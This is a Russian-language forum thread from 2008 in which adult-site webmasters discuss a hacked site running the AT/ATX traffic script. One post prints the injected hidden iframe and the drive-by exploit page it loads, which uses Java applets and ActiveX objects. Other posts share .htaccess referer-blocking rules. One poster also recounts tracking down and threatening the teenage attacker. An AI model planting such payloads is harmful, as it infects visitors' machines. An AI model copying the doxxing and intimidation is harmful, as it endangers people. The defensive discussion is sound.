Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
CJs
»
Тема:
Очередной взлом
Новая тема
Ответить
цитата
01/06/08 в 18:10
WorldTraffic
проверяйтесь
защищен был по всем методам которые предлагались тут
ну и вот собственно код который появился на маин паге
Цитата:
scr--ipt scr--ipt
может кто расшифрует что там в нутри куда ведет, надо банить этого пидара заебал уже
p.s. простите за французкий
Последний раз редактировалось: WorldTraffic (
01/06/08 в 21:16
), всего редактировалось 2 раз(а)
цитата
01/06/08 в 18:16
WorldTraffic
особенности взлома, единственный запрос IP (ukraine) tried to login with login / . был с моего IP
в корне уже нету файла sync и как там второй немогу вспомнить, кароче с нулевым размером нету таких
темплейт изменил вроде нормал все но вирус всеравно появляется, может когда расшифрует кто то будет понятно откуда он туда ложиться
цитата
01/06/08 в 19:00
Alchemist
Код:
<iframe src="xttp://www.dfucking-asians.com/images/z/static.php?sig=777573287F657E62743F737761376F7B580C474945" height="2" style="display:none" width="2"></iframe>
По указанному урлу код:
Код:
<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet><applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT><param name=usid value=us0105><param name=linkurl value="http://www.dfucking-asians.com/images/z/ex.php"></applet><OBJECT id="hhctrl_HTML_Opener" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"> <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"><PARAM name="Item1" value="command;ms-its:addremov.chm::/win_addprog_window_component.htm"></OBJECT><textarea id="ObjMaker" cols=10 rows=10 style="display:none"><OBJECT id="hhctrl_JS_Runner" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"></textarea><OBJECT id="DHTML_Edit" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width=10 height=10 align="middle"><PARAM NAME="ActivateApplets" VALUE="1"><PARAM NAME="ActivateActiveXControls" VALUE="1"></OBJECT> <DIV id="ObjectContainer"></DIV>
Что он делает - ХЗ.
цитата
01/06/08 в 20:46
mickey
наверное грузит вот это
dfucking-asians.com/images/z/ex.php
цитата
02/06/08 в 00:03
weely6
вот пидорасы хакеры работать нармально не дают
я так понял AT ломанули, ну продают они столько копий, думаю что не бедные, а такое чувство что пишет его студент. Тестеров пустить на мыло!
Топикстартеру сочувствую!
цитата
02/06/08 в 00:58
PayBoy
Меня один раз ломанули, но не через сайт а через мой ПК, пока еще молодой был и ИЕ юзал. Чел засадил аналогичный код, на все мои сайты на тот момент, их было штук 20, и упёр асю.
Что бы вы думали, просидел ночь, расшифрил код, нашел домен куда ведет код, нашел форум на юмаксе пидераста который этот домен там пытался продать, по его нику нашел его асю, 2ю асю, по ним нашел объявы из соседнего города электросталь с его мобильным домашним и с адресом.
И в 9 утра позвонил ему )))
Чел был в шоке, 15 летний хрен, как выяснилось имел и белые блоги рашн, писал там умные статьи вроде о безопасности и т.д.
Вообщем в 9 утра я ему в кратце объяснил где в его городе я буду его ждать что бы познакомиться поближе, и попросил убрать всю херь с доменов.
Благо чел в тот же вечер что забрал асю, мне её вернул просто на халяву, мотивировав это тем что мол русских не обижаю.
И благо в 9 утра понял что лучше всё поправить, рассказал мне как и что удалить, убрал меня из своей базы и т.д.
Вообщем ТС гугл тебе в руки, и ищи где доменчик палился, на который ведёт ссылка, может свезеш выловиш своего 15 летнего хренакера )
цитата
02/06/08 в 09:46
Project
ТС, вот скажи, не надоело мазохизмом заниматься?
Меняешь скрипт и спишь спокойно...
Ведь, даже если посмотреть на историю апдейтов атл - это смех сквозь слезы...
Прально тут сказали:
Цитата:
а такое чувство что пишет его студент
цитата
02/06/08 в 11:44
WorldTraffic
вот на GYF проспамил он свои домены
ник dFaWebmaster
ICQ 324886262 ник Rule написано из USA
ttp://www.912asians.com
912 Asians - 10k traffic
ttp://www.dfucking-asians.com
dFucking Asian Gals- 5k
ttp://www.jpcoed.com
Japan Coed Fever - 7.3k
ttp://www.wildasia4u.com
Wild Asia 4u - 25k
ttp://www.pretty-asians.com
Pretty Asians -5k
ttp://www.lesbian-massage.com
Lesbian Massage Idols - 12k
ttp://www.cute-hentai.com
Cute Hentai - 16k
ttp://www.rulestgp.com
Rules Tgp - 13.2k
ttp://www.shadowniche.com
Shadow Niche Asians - 7k
ttp://www.bondagesushi.com
Bondage Sushi Tgp - 12k
ttp://www.bukakakewhores.com
Bukakake Whores - 2k
может кто знает этого человека баньте его
p.s. потер плохое слово малоли может действительно поломали
Последний раз редактировалось: WorldTraffic (
02/06/08 в 13:53
), всего редактировалось 1 раз
цитата
02/06/08 в 12:04
Diablo
не тупите , dfucking-asians точно так же поломан , как и топикстартер . каждый сломанный домен юзается в качестве гейта для следующих зараженных . заебешься вычислять в общем %(
цитата
02/06/08 в 12:26
WorldTraffic
Diablo II писал:
не тупите , dfucking-asians точно так же поломан , как и топикстартер . каждый сломанный домен юзается в качестве гейта для следующих зараженных . заебешься вычислять в общем %(
как ты определил что он поломан?
цитата
02/06/08 в 12:56
adminZ
world-gay-sex писал:
защищен был по всем методам которые предлагались тут
Скорее всего рефом бахнули..
У тебя был токо так закрыт ??
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .*
http://google.com/
[L]
ну и cgi там разные
я начинаю думать что этого мало...
цитата
02/06/08 в 13:04
Diablo
world-gay-sex писал:
как ты определил что он поломан?
100%
можешь глянуть топики по этой трабле даже тут на мастере ,
слоника так же обвиняли %) с его ебони-факиннг.нет грузилось гумно .
цитата
02/06/08 в 13:25
WorldTraffic
adminZ писал:
Скорее всего рефом бахнули..
У тебя был токо так закрыт ??
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .*
http://google.com/
[L]
ну и cgi там разные
я начинаю думать что этого мало...
у меня было вот так
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC]
RewriteRule .*
http://google.com/
[L]
+
в папках ATX блокировки по IP на файлы которые ломали
цитата
02/06/08 в 13:27
PayBoy
у меня значит проще ситуёвина была...
Ищите во всём worlde а найдёте, у страивайте парню gay sex
цитата
02/06/08 в 13:57
WorldTraffic
Diablo II писал:
100%
можешь глянуть топики по этой трабле даже тут на мастере ,
слоника так же обвиняли %) с его ебони-факиннг.нет грузилось гумно .
если чела поломали, возможно кто то из трейдеров прочитав топик стукнет к нему скажет и он все почистит а может еще и инфу какую надыбает тем самым поможет найти уродца
а если он сам уродец то тогда ему место в уродах
цитата
02/06/08 в 15:21
Soft-Com
world-gay-sex писал:
проверяйтесь
защищен был по всем методам которые предлагались тут
Цитата:
особенности взлома, единственный запрос IP (ukraine) tried to login with login / . был с моего IP
только судя по этому понятно что нифга ты небыл защищён - пускало со всех айпишников в админку (не прикрыт admin.cgi хтаксесом) - вот он тебе говно и воткнул в sec.log.
цитата
02/06/08 в 17:36
WorldTraffic
Soft-Com писал:
только судя по этому понятно что нифга ты небыл защищён - пускало со всех айпишников в админку (не прикрыт admin.cgi хтаксесом) - вот он тебе говно и воткнул в sec.log.
т.е. по твоему надо было намертво закрыть что бы даже я не мог зайти?
не понял я твоего поста
p.s. вот с таким содержанием лежит хетаксес в папке atx
<Files admin.cgi>
Order Deny,Allow
Deny from all
Allow from мой IP
Allow from мой IP
</Files>
<Files x2.cgi>
Order Deny,Allow
Deny from all
Allow from мой IP
Allow from мой IP
</Files>
цитата
02/06/08 в 18:04
Soft-Com
оч странно ...
запись в sec.log которую ты скинул может появится только при прямом обращении к admin.cgi
есть логи апача по этому домену?
цитата
02/06/08 в 18:18
MaxLester
at3/atx? Слеза наворачивается, когда вижу такие топики. Меняйте скрипт - возможно временное, но решение проблемы.
цитата
02/06/08 в 20:47
WorldTraffic
у кого стоит ST проверьте его file check запустите, кароче в папку тумбы в подпапки понапихивал php файлов со своими чудо кодами
+
нашол в папках к которым уже 2 года не обращался папку extractor в ней куча всего и там вирусы
Новая тема
Ответить
Эта страница в полной версии